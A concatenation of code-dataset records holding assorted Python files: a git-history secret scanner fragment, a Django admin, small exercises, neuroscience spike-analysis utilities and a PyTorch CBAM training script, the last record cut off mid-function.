prev_commit.message)\n                    found_regex['diff'] = ''\n                    found_regex['type'] = 'MatchInFilename'\n                    found_regex['stringsFound'] = found_string\n                    found_regex['reason'] = key\n                    found_regex['commitHash'] = commitHash\n                    regex_matches.append(found_regex)\n    return regex_matches\n\n\n# def searchSensitiveFilesInRepo(project_path, git_url, json_repos):\n#     \"\"\"\n#     Deprecated function\n#     :param project_path:\n#     :param git_url:\n#     :param json_repos:\n#     :return:\n#     \"\"\"\n#     fs_objects = os.listdir(project_path)\n#     # repo = Repo(project_path)\n#     # changed = [item.a_path for item in repo.index.diff(None) ]\n#     foundIssues = []\n#     for fs_object in fs_objects:\n#         found_regexes = regex_fs_check_tree(fs_object, git_url, json_repos)\n#         foundIssues += found_regexes\n#     return foundIssues\n\n\ndef find_strings(project_path, git_url, json_repos, since_commit=None, max_depth=None, do_regex=False, do_entropy=True):\n    \"\"\"\n    Search for sensitive data in git commit diffs\n    :param project_path: string\n    :param git_url: string\n    :param json_repos: dictionary\n    :param since_commit: string -- commit hash at which to stop scanning\n    :param max_depth: integer\n    :param do_regex: boolean\n    :param do_entropy: boolean\n    :return: list of issue dictionaries\n    \"\"\"\n    repo = Repo(project_path)\n    already_searched = set()\n\n    found_issues = []\n    for remote_branch in repo.remotes.origin.fetch():\n        since_commit_reached = False\n        branch_name = remote_branch.name.split('/')[1]\n        try:\n            repo.git.checkout(remote_branch, b=branch_name)\n        except Exception:\n            # the branch may already be checked out locally\n            pass\n        prev_commit = None\n        for curr_commit in repo.iter_commits(max_count=max_depth):\n            commitHash = curr_commit.hexsha\n            if commitHash == since_commit:\n                since_commit_reached = True\n            if since_commit and since_commit_reached:\n                prev_commit = curr_commit\n                continue\n            if not prev_commit:\n                pass\n            else:\n                # Avoid searching the same diffs\n                hashes = str(prev_commit) + str(curr_commit)\n                if hashes in already_searched:\n                    prev_commit = curr_commit\n                    continue\n                already_searched.add(hashes)\n\n                diff = prev_commit.diff(curr_commit, create_patch=True)\n                for blob in diff:\n                    printableDiff = blob.diff.decode('utf-8', errors='replace')\n                    if printableDiff.startswith(\"Binary files\"):\n                        continue\n                    commit_time = datetime.datetime.fromtimestamp(prev_commit.committed_date).strftime('%Y-%m-%d %H:%M:%S')\n                    foundIssues = []\n                    if do_entropy:\n                        entropicDiff = find_entropy(printableDiff, commit_time, branch_name, prev_commit, blob,\n                                                    commitHash, git_url, json_repos)\n                        if entropicDiff:\n                            foundIssues.append(entropicDiff)\n                    if do_regex:\n                        found_regexes = regex_txt_check(printableDiff, commit_time, branch_name, prev_commit, blob,\n                                                        commitHash, git_url, json_repos)\n                        foundIssues += found_regexes\n                        found_files = regex_fs_check_tree(commit_time, branch_name, prev_commit, commitHash, git_url,\n                                                          json_repos)\n                        foundIssues += found_files\n\n                    for foundIssue in foundIssues:\n                        # print_results(printJson, foundIssue)\n                        # print(\"Issue is \", foundIssue)\n                        found_issues.append(foundIssue)\n\n            prev_commit = curr_commit\n    # output[\"project_path\"] = project_path\n    # shutil.rmtree(project_path, onerror=del_rw)\n    return found_issues\n\n","repo_name":"unk1nd0n3/bitbucket-creds-checker","sub_path":"truffleHog/truffleHog.py","file_name":"truffleHog.py","file_ext":"py","file_size_in_byte":14263,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"}
{"seq_id":"24161288031","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .models import User\nfrom diaries.models import Flower\n\n\nclass 
FlowerInline(admin.TabularInline):\n    model = Flower.users.through\n    extra = 1\n\n\n@admin.register(User)\nclass CustomUserAdmin(UserAdmin):\n    list_display = (\n        \"id\",\n        \"username\",\n        \"flowers_count\",\n    )\n    ordering = (\"id\",)\n    fieldsets = UserAdmin.fieldsets + (\n        (\n            \"social\",\n            {\n                \"fields\": (\n                    \"social\",\n                    \"social_id\",\n                )\n            },\n        ),\n    )\n    inlines = (FlowerInline,)\n\n    @admin.display()\n    def flowers_count(self, obj):\n        return obj.flowers.count()\n","repo_name":"minicks/FlowerDiary","sub_path":"backend/accounts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"73849189904","text":"\"\"\" Query student grades \"\"\"\n\nimport csv\n\n\"\"\" Read the file into a list \"\"\"\nscoreFile = open(\"score.csv\",\"r\",encoding=\"utf-8-sig\")\nline = csv.reader(scoreFile,delimiter=',')\nperRow = []\nfor row in line:\n    perRow.append(row)\nscoreFile.close()\n\nprint(perRow)\n\n\n\"\"\" Look up a student \"\"\"\nname = input(\"请输入你想查询的学生姓名:\")\n\nf = 1\nfor i in range(1,4) :\n    if name==perRow[i][0] :\n        print(\"作业1 \"+perRow[i][1]+\" 作业2 \"+perRow[i][2]+\" 期末考试 \"+perRow[i][3]+\" 总成绩 \"+perRow[i][4])\n        f = 0\nif f :\n    print(\"此人不存在!\")\n","repo_name":"bbdzs/Code-for-Programming-Courses","sub_path":"编程导论(python)/作业/week13-Lab02/lab2-2.py","file_name":"lab2-2.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
{"seq_id":"29897664611","text":"from collections import deque\n\nn, k = map(int, input().split()) # read n and k\ntest_tube = [] # list that stores the test-tube grid\nvirus_data = [] # list that stores the virus info\n# read the test-tube grid\nfor i in range(n):\n    test_tube.append(list(map(int, input().split())))\n    for j in range(n):\n        # if the row that was read contains a virus\n        if test_tube[i][j] != 0:\n            # add the virus number, time and position to the virus info\n            virus_data.append((test_tube[i][j], 0, i, j))\n\n# sort by virus number in ascending order, then insert into the queue\nvirus_data.sort()\nqueue = deque(virus_data)\n\n# read the target variables\ntarget_s, target_x, target_y = map(int, input().split()) \n\n# up/down/left/right movement\ndx = [0, 0, -1, 1]\ndy = [1, -1, 0, 0]\n\n# repeat until the queue is empty\nwhile queue:\n    virus, s, x, y = queue.popleft()\n    # stop once s seconds have passed\n    if s == target_s:\n        break\n    # check up/down/left/right from the current node\n    for i in range(4):\n        nx = x + dx[i]\n        ny = y + dy[i]\n        # if we can move to that position\n        if 0 <= nx < n and 0 <= ny < n:\n            # and there is no virus there yet\n            if test_tube[nx][ny] == 0:\n                # spread the virus\n                test_tube[nx][ny] = virus\n                # insert the newly spread virus into the queue\n                queue.append((virus, s + 1, nx, ny))\n\nprint(test_tube[target_x - 1][target_y - 1])\n\n# Solution: https://inistory.tistory.com/143","repo_name":"ShShin98/Baekjoon_CodingTest","sub_path":"dfs,bfs/#18405 경쟁적 전염(다시).py","file_name":"#18405 경쟁적 전염(다시).py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"41746514740","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_cluster_connection_probs(REE, k, pee):\n    p_out = pee * k / (REE + k - 1)\n    p_in = REE * p_out\n    return p_in, p_out\n\n\ndef spikes_to_binary(M):\n    \"\"\"\n    From SpikeMonitor object it returns a binary numpy array with\n    spikes in particular time points.\n    :param M: SpikeMonitor object\n    :return: numpy matrix with spike times\n    \"\"\"\n\n    try:\n        tpnts = np.arange(float(M.clock.start), float(M.clock.end), float(M.clock.dt))\n    except AttributeError:\n        raise AttributeError(\"SpikeMonitor doesn't contain any recordings\")\n    binarr = np.zeros((len(M.spiketimes.keys()), 
len(tpnts)))\n    for k, sp_times in M.spiketimes.items():\n        if len(sp_times) == 0:\n            continue\n        for t_sp in sp_times:\n            binarr[k][np.argmin(np.abs(t_sp - tpnts))] = 1\n    return binarr\n\n\ndef spikes_counter(M, timewin):\n    \"\"\"\n    From SpikeMonitor object it returns a numpy array with spike counts\n    in time windows.\n    :param M: SpikeMonitor object\n    :param timewin: width of the counting window\n    :return: numpy matrix with spike counts\n    \"\"\"\n    try:\n        tpnts = np.arange(M.clock.start, M.clock.end + 0.5 * timewin, timewin)\n    except AttributeError:\n        raise AttributeError(\"SpikeMonitor doesn't contain any recordings\")\n    counts = np.zeros((len(M.spiketimes.keys()), len(tpnts) - 1))\n    for k, sp_times in M.spiketimes.items():\n        if len(sp_times) == 0:\n            continue\n        for t_sp in sp_times:\n            idxs = np.where(tpnts >= t_sp)[0]\n            if len(idxs) == 0:\n                counts[k][-1] += 1\n            else:\n                counts[k][idxs[0] - 1] += 1\n    return counts\n\n\ndef firing_rates(spike_data, time):\n    'Return firing rate for each neuron n from *spike_data*'\n    return (spike_data.sum(axis=-1)).flatten() / time\n\n\ndef fano_factor(spike_data):\n    \"\"\"\n    Computes Fano factor from matrix *spike_data* of shape (r, k, n, m)\n    where *r* - realizations, *k* - nr of trials, *n* - nr of neurons,\n    *m* - time steps\n    \"\"\"\n    return (np.var(spike_data, axis=1)/np.mean(spike_data, axis=1)).flatten()\n\n\ndef corr_coef(trial_data):\n    \"\"\"\n    computes pairwise correlation coefficient from a given matrix of trial data\n    :param trial_data: matrix of trial data with dimension trials x neurons x timewindows.\n    :return: correlation matrix rho\n    \"\"\"\n\n    n_trials = trial_data.shape[0]\n    n_neurons = trial_data.shape[1]\n\n    rho = np.zeros((n_neurons, n_neurons))\n    cov = np.zeros(n_trials)\n    var_factor = np.zeros(n_trials)\n\n    for i in range(n_neurons):\n        for j in range(i + 1):\n            for t in range(n_trials):\n                cov[t] = np.mean(trial_data[t, i, :] * trial_data[t, j, :]) - \\\n                         np.mean(trial_data[t, i, :]) * np.mean(trial_data[t, j, :])\n                var_factor[t] = np.sqrt(np.mean(np.var(trial_data[t, i, :])) * np.mean(np.var(trial_data[t, j, :])))\n            rho[i, j] = np.mean(cov) / np.mean(var_factor)\n            rho[j, i] = rho[i, j]\n    return rho\n\n\ndef corr_coef_new(trial_data):\n    \"\"\"\n    computes pairwise correlation coefficient from a given matrix of trial data\n    With numpy corrcoef instead of explicit calculations.\n    :param trial_data: matrix of trial data with dimension trials x neurons x timewindows.\n    :return: correlation matrix rho\n    \"\"\"\n\n    n_trials = trial_data.shape[0]\n    n_neurons = trial_data.shape[1]\n\n    rho = np.zeros((n_neurons, n_neurons))\n    cov = np.zeros(n_trials)\n    var_factor = np.zeros(n_trials)\n\n    for i in range(n_neurons):\n        for j in range(i + 1):\n            for t in range(n_trials):\n                cov[t] = np.corrcoef(trial_data[t,i,:], trial_data[t,j,:])[0,1]\n            cov_n = cov[~np.isnan(cov)]\n            rho[i, j] = np.mean(cov_n)\n            rho[j, i] = rho[i, j]\n    return rho\n\n\ndef extract_cluster_corr_coef(rho, k=50):\n    \"\"\"\n    Extracts correlation values for all clusters from correlation matrix rho.\n    :param rho: correlation matrix\n    :param k: number of clusters in the network\n    :return: correlation matrix for every cluster: k x (neuron_pairs)\n    \"\"\"\n    n_neurons = rho.shape[0]\n    # determine number of pairs per cluster; integer division, because these\n    # values are used as array dimensions and slice indices below\n    neurons_per_cluster = n_neurons // k\n    pairs_per_cluster = neurons_per_cluster * (neurons_per_cluster - 1) // 2\n    cluster_corr_coef = np.zeros((k, pairs_per_cluster))\n    for k_idx in range(k):\n        # get cluster part from corr_coef matrix\n        cluster_cc = rho[(k_idx * neurons_per_cluster):(k_idx + 1) 
* neurons_per_cluster,\n (k_idx * neurons_per_cluster):(k_idx + 1) * neurons_per_cluster]\n # save lower triangle of current cluster corr matrix in matrix for all clusters\n cluster_corr_coef[k_idx, :] = get_lower_triangle(cluster_cc)\n # remove nans before returning\n return remove_nans(cluster_corr_coef)\n\n\ndef extract_all_corr_coef(rho):\n \"\"\"\n Extracts only relevant values from correlation matrix rho\n :param rho: correlation matrix\n :return: 1D array of correlation values\n \"\"\"\n # get lower triangle of the corr matrix as vector\n rho_vec = get_lower_triangle(rho)\n # remove nans\n return remove_nans(rho_vec)\n\n\ndef extract_random_corr_coef(rho, size):\n \"\"\"\n Extracts values of random subset of neurons pairs from correlation matrix rho\n :param rho: correlation matrix\n :param size: size of subset\n :return: 1D array of correlation values\n \"\"\"\n # get indices of random pairs\n idx = np.random.randint(0,rho.shape[0]-1, size=size)\n rho_vec = get_lower_triangle(rho)\n # remove nans\n return remove_nans(rho_vec[idx])\n\n\ndef get_lower_triangle(m):\n \"\"\"\n Extracts lower triangle of matrix, without diagonal\n :param m: matrix\n :return: lower triangle\n \"\"\"\n # get lower triangle indices without diagonal (k<0)\n i,j = np.tril_indices(m.shape[0], k=-1)\n # return entries in correlation matrix in array\n return m[i,j]\n\n\ndef remove_nans(m, keep_matrix=False):\n \"\"\"\n removes nans from a matrix. if keep_matrix is True then nans are set to zero and the matrix is returned. Else,\n a vector with all finite values of the matrix is returned.\n :param m: matrix\n :param keep_matrix: flag for keeping the structure of the matrix\n :return: matrix or vec without nans\n \"\"\"\n if keep_matrix:\n for i in range(m.shape[0]):\n # get current row and set nans to zero\n tmp = m[i, :]\n tmp[np.isnan(tmp)] = 0\n # replace row in m\n m[i, :] = tmp\n else:\n m = m[np.isfinite(m)]\n return m\n\n\ndef sample_in_cluster(nrns=4000, k=50, picked=20):\n '''\n Reduce number of neurons to *picked* in every of *k* clusters.\n :param nrns: total numer of neurons\n :param k: number of clusters\n :param picked: how many neurons pick from each cluster\n :return: indices of chosen neurons\n '''\n ncl = nrns//k # neuron in cluster\n assert ncl>picked, \"picked is too big\"\n nrnnumbers = np.arange(nrns) # indices of all neurons\n idxvec = np.zeros(k*picked) # vector with new indices\n for i in range(k):\n ix_ = np.random.choice(ncl, picked, replace=False)\n idxvec[i*picked:(i+1)*picked] = nrnnumbers[i*ncl:(i+1)*ncl][ix_]\n return idxvec.astype('int')\n\n\ndef plot_histogram(data1, data2, binwidth, xlabel=''):\n \"\"\"\n Plot histogram for two given arrays of data\n :param data1: first array\n :param data2: second array\n :param binwidth: width of the bins\n :param xlabel: string for xlabel\n :return: no return\n \"\"\"\n # plot the two array as step histogram\n bins1 = np.arange(min(data1), max(data1) + binwidth, binwidth)\n plt.hist(data1, bins=bins1, align='left', histtype='step')\n plt.axvline(data1.mean(), color='b', linestyle='dashed', linewidth=2)\n bins2 = np.arange(min(data2), max(data2) + binwidth, binwidth)\n plt.hist(data2, bins=bins2, align='left', histtype='step')\n plt.axvline(data2.mean(), color='g', linestyle='dashed', linewidth=2)\n plt.legend(['mean uni', 'mean clus', 'Uniform', 'Clustered'])\n plt.xlabel(xlabel)\n plt.ylabel('Count')\n\n\ndef plot_correlation(rho1, rho2, binwidth, title='', show=True):\n \"\"\"\n Plot correlation histograms for two given arrays. 
It picks the same\n number of valid values from both matrices by random.\n :param rho1: first correlation array\n :param rho2: second correlation array\n :param binwidth: width of the bins\n :param title: string for plot title\n :param show: boolean value - if True than picture is shown\n :return: no return\n \"\"\"\n min_length = min(len(rho1), len(rho2))\n rho1_pick = rho1[np.random.choice(len(rho1),size=min_length, replace=False)]\n rho2_pick = rho2[np.random.choice(len(rho2),size=min_length, replace=False)]\n plot_histogram(rho1_pick, rho2_pick, binwidth, xlabel='correlation')\n plt.title(title)\n if show:\n plt.show()\n","repo_name":"janfb/bccn_programming_project5","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12102989127","text":"# -*- coding: utf-8 -*-\n# @Author : Mumu\n# @Time : 2021/11/18 9:40\n'''\n@Function:\n \n'''\nimport os\nimport shutil\nimport time\n\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\nimport torch\nfrom model_resnet import *\nfrom torchsummary import summary\n\n\ntorch.cuda.set_device(0)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nargs = {'lr': 0.1,\n 'prefix': 'RESNET50_IMAGENET_CBAM',\n 'arch': 'resnet',\n 'checkpoint': './checkpoints/RESNET50_IMAGENET_CBAM_checkpoint.pth.tar',\n 'start_epoch': 0,\n 'epochs': 10,\n 'Batch_size': 4}\nbest_prec1 = 0\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n lr = args['lr'] * (0.1 ** (epoch // 30))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\nclass DataLoad(Dataset):\n def __init__(self, path, regno_data):\n self.path = path\n self.data = regno_data\n self.transform = transforms.Compose([transforms.ToTensor(),\n transforms.Resize((224, 224)),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])])\n\n def __getitem__(self, index):\n img_name = self.path + self.data[index][0] + '.jpg'\n img = cv2.imread(img_name)\n img = self.transform(img).to(device)\n return img, np.array(self.data[index][1], dtype='int64')\n\n def __len__(self):\n return len(self.data)\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].contiguous().view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n model.train()\n\n end = time.time()\n for i, (img, target) in enumerate(train_loader):\n data_time.update(time.time() - end)\n\n target = target.to(device)\n img_val = 
torch.autograd.Variable(img)\n target_val = torch.autograd.Variable(target)\n\n output = model(img_val)\n loss = criterion(output, target_val)\n\n preac1, preac5 = accuracy(output.data, target, topk=(1, 5))\n losses.update(loss.item(), img.size(0))\n top1.update(preac1[0], img.size(0))\n top5.update(preac5[0], img.size(0))\n\n optimizer.zero_grad()\n loss.backward() # 梯度反传\n optimizer.step() # 保留梯度\n\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % 100 == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, i, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n\n\ndef validate(val_loader, model, criterion, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda()\n input_var = torch.autograd.Variable(input, volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n\n # compute output\n output = model(input_var)\n loss = criterion(output, target_var)\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n losses.update(loss.item(), input.size(0))\n top1.update(prec1[0], input.size(0))\n top5.update(prec5[0], input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % 100 == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n\n print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'\n .format(top1=top1, top5=top5))\n\n return top1.avg\n\n\ndef save_checkpoint(state, is_best, prefix):\n filename = './checkpoints/%s_checkpoint.pth.tar' % prefix\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, './checkpoints/%s_model_best.pth.tar' % prefix)\n\n\ndef main():\n global best_prec1\n from tensorboardX import SummaryWriter\n data_df = pd.read_csv('./data/index.csv')\n\n train_data = data_df.sample(frac=0.8)\n val_data = data_df.sample(frac=0.2)\n train_data = np.array(train_data).tolist()\n val_data = np.array(val_data).tolist()\n\n\n # print(train_data[1][0], train_data[1][1])\n url = './data/img_crop/'\n train_loader = DataLoader(DataLoad(url, train_data), batch_size=args['Batch_size'], shuffle=True)\n val_loader = DataLoader(DataLoad(url, val_data), batch_size=args['Batch_size'])\n\n # build model\n model = ResidualNet('ImageNet', 50, 5, 'CBAM')\n model.to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n # optimizer = torch.optim.SGD(model.parameters(), lr=0.1)\n optimizer = torch.optim.Adam(model.parameters(),)\n data = torch.Tensor(8, 3, 224,224)\n data = data.to(device)\n writer = SummaryWriter()\n writer.add_graph(model=model, input_to_model=data,verbose=True)\n writer.close()\n # summary(model, (3, 224, 224))\n\n #load the checkpoint\n if args['checkpoint']:\n if os.path.isfile(args['checkpoint']):\n print(\"===> loading checkpoint '{}'\".format(args['checkpoint']))\n checkpoint = 
torch.load(args['checkpoint'])\n args['start_epoch'] = checkpoint['epoch']\n best_prec1 = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n if 'optimizer' in checkpoint:\n optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"==> loaded checkpoint '{}' (epoch {})\"\n .format(args['checkpoint'], checkpoint['epoch']))\n else:\n print(\"==> no checkpoint found at '{}'\".format(args['checkpoint']))\n\n for _ in range(args['start_epoch'], args['epochs']):\n adjust_learning_rate(optimizer, _)\n\n train(train_loader, model, criterion, optimizer, _)\n\n prec1 = validate(val_loader, model, criterion, _)\n\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n save_checkpoint({\n 'epoch': _ + 1,\n 'arch': args['arch'],\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n 'optimizer': optimizer.state_dict(),\n }, is_best, args['prefix'])\n\n\nif __name__ == '__main__':\n main()","repo_name":"a281153685/MobileNet_SE_MO","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2001565541","text":"class Hayvan:\n ad = \"\"\n\n def adin_ne(self):\n print(\"Hayvanın adı bilinmiyor.\")\n\n def konus(self):\n adi = self.ad\n print(f\"{adi} konuşuyor.\")\n\n def oyna(self, arkadas):\n print(f\"{self.ad},{arkadas.ad} ile oynuyor\")\n\n def oyuncakla_oyna(self, oyuncak):\n print(f\"{self.ad}, {oyuncak} ile oynuyor.\")\n\n\nrodi = Hayvan()\nrodi.ad = \"Rodi\"\nmaya = Hayvan()\nmaya.ad = \"Maya\"\n\n# Hayvan.konus(rodi)\nrodi.konus()\nmaya.konus()\n\n\n# rodi.oyna = lambda arkadas: print(f\"Rodi, {arkadas.ad} ile oynuyor.\")\nrodi.oyna(maya) # Rodi, Maya ile oynuyor.\n\nmaya.oyna(rodi)\n\n\noyuncak = \"ayicik\"\n\nrodi.oyuncakla_oyna(oyuncak) # Rodi, top ile oynuyor.\nmaya.oyuncakla_oyna(oyuncak) # Maya, top ile oynuyor.\n\n# Hayvan.oyuncakla_oyna(rodi, oyuncak)\n","repo_name":"niturk/oyk_python_2023_nesne","sub_path":"3_nesne_hayvan.py","file_name":"3_nesne_hayvan.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18052913966","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\n# What would you like? (espresso/latte/cappuccino): espresso\n# Please insert coins.\n# how many quarters?: 20\n# how many dimes?: 3\n# how many nickles?: 3\n# how many pennies?: 3\n# Here is $4.0 in change.\n# What would you like? (espresso/latte/cappuccino): latte\n# Please insert coins.\n# how many quarters?: 28\n# how many dimes?: 83\n# how many nickles?: 28\n# how many pennies?: 378\n# Here is $18.0 in change.\n# What would you like? (espresso/latte/cappuccino): cappuccino\n# Sorry there is not enough water.\n# What would you like? (espresso/latte/cappuccino): report\n# Water: 50ml\n# Milk: 50ml\n# Coffee: 58ml\n# Money: $4.0\n# What would you like? (espresso/latte/cappuccino): test\n# ERROR~~~\n# What would you like? (espresso/latte/cappuccino):\n\nmenu = Menu()\ncoffee_maker = CoffeeMaker()\nmoney_machine = MoneyMachine()\nis_On = True\n\nwhile is_On:\n options = menu.get_items()\n choice = input(f\"What would you like? 
({options}):\")\n if choice == \"off\":\n is_On = False\n elif choice == \"report\":\n coffee_maker.report()\n money_machine.report()\n else:\n drink = menu.find_drink(choice)\n if coffee_maker.is_resource_sufficient(drink) and money_machine.make_payment(drink.cost):\n coffee_maker.make_coffee(drink)\n","repo_name":"tranthanhbinh2603/100-days-of-code-python","sub_path":"Day 016/Project days 016.py","file_name":"Project days 016.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26499142744","text":"from django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render\n\nfrom jobs.models import Job,Employer,Location\nfrom likes.models import UserLike\nfrom matcho.models import Match,PositionMatch,EmployerMatch,LocationMatch\n\nfrom questions.forms import UserResponseForm\nfrom questions.models import Question\nfrom accounts.forms import SignupForm\nfrom accounts.models import User\n\n\n\n\ndef home(request):\n if request.user.is_authenticated:\n matches=Match.objects.get_matches_with_percent(request.user)[:6]\n positions=PositionMatch.objects.filter(user=request.user)[:6]\n if positions.count() > 0:\n positions[0].check_update(20)\n locations=LocationMatch.objects.filter(user=request.user)[:6]\n employers=EmployerMatch.objects.filter(user=request.user)[:5]\n mutual_likes= UserLike.objects.get_all_mutual_likes(request.user,4)\n new_user=False\n if len(mutual_likes) == 0 and len(matches)== 0:\n new_user=True\n\t\t# for match in matches:\n\t\t# \tjob_set=match[0].userjob_set.all()\n\t\t# \tif job_set.count() > 0:\n\t\t# \t\tfor job in job_set:\n\t\t# \t\t\tif job.position not in positions:\n\t\t# \t\t\t\tpositions.append(job.position)\n\t\t# \t\t\t\tthe_job=Job.objects.get(text__iexact=job.position)\n\t\t# \t\t\t\tjobmatch, created=PositionMatch.objects.get_or_create(user=request.user,job=the_job)\n\t\t# \t\t\t\ttry:\n\t\t# \t\t\t\t\tthe_job=Job.objects.get(text__iexact=job.position)\n\t\t# \t\t\t\t\tjobmatch, created=JobMatch.objects.get_or_create(user=request.user,job=the_job)\n\t\t# \t\t\t\texcept:\n\t\t# \t\t\t\t\tpass\n\t\t# \t\t\tif job.location not in locations:\n\t\t# \t\t\t\tlocations.append(job.location)\n\t\t# \t\t\t\ttry:\n\t\t# \t\t\t\t\tthe_loc=Location.objects.get(name__iexact=job.location)\n\t\t# \t\t\t\t\tlocmatch, created=LocationMatch.objects.get_or_create(user=request.user,location=the_loc)\n\t\t# \t\t\t\t\tprint(locmatch)\n\t\t# \t\t\t\texcept:\n\t\t# \t\t\t\t\tpass\n\t\t# \t\t\tif job.employer_name not in employers:\n\t\t# \t\t\t\temployers.append(job.employer_name)\n\t\t# \t\t\t\ttry:\n\t\t# \t\t\t\t\tthe_employer=Employer.objects.get(name__iexact=job.employer_name)\n\t\t# \t\t\t\t\tempymatch, created=EmployerMatch.objects.get_or_create(user=request.user,employer=the_employer)\n\t\t# \t\t\t\t\tprint(empymatch)\n\t\t# \t\t\t\texcept:\n\t\t# \t\t\t\t\tpass\n question_instance=None\n queryset = Question.objects.get_unanswered(request.user).order_by('-timestamp')\n if queryset.count()>0:\n question_instance= queryset.order_by(\"?\").first()\n question_form=UserResponseForm()\n context = {\n \"queryset\": queryset,\n \"matches\":matches,\n \"positions\":positions,\n \"locations\":locations,\n \"employers\":employers,\n \"mutual_likes\":mutual_likes,\n \"new_user\":new_user,\n \"question_form\":question_form,\n \"question_instance\":question_instance\n }\n return render(request, \"dashboard/home.html\", context)\n return 
render(request, \"accounts/signup.html\", {})\n","repo_name":"deftydev/Matchmaker","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15121142145","text":"#!python3\n\n\nINPUT = '792845136'\nTEST_INPUT = '389125467'\n\n\nclass Node(object):\n def __init__(self, label):\n self.label = label\n self.next = None\n\n\n def __repr__(self):\n next_label = self.next.label if self.next else '?'\n return f'Node({self.label}, next: {next_label})'\n\n\nclass CircularLinkedList(object):\n def __init__(self, current, size):\n self.current = current\n self.size = size\n\n\n def move(self):\n removed_start = self.current.next\n removed_end = removed_start.next.next\n # removed_end.next = None\n after_removed = removed_end.next\n self.current.next = after_removed\n\n destination = self._get_destination_cup(removed_start)\n after_destination = destination.next\n destination.next = removed_start\n removed_end.next = after_destination\n\n self.current = self.current.next\n\n\n def get_node_with_label(self, label):\n node = self.current\n while node.label != label:\n node = node.next\n return node\n\n\n def _get_destination_cup(self, removed_start):\n destination_label = self._get_destination_cup_label(removed_start)\n # print('destination label', destination_label)\n node = self.current\n while node.label != destination_label:\n node = node.next\n return node\n\n\n def _get_destination_cup_label(self, removed_start):\n removed_labels = [\n removed_start.label,\n 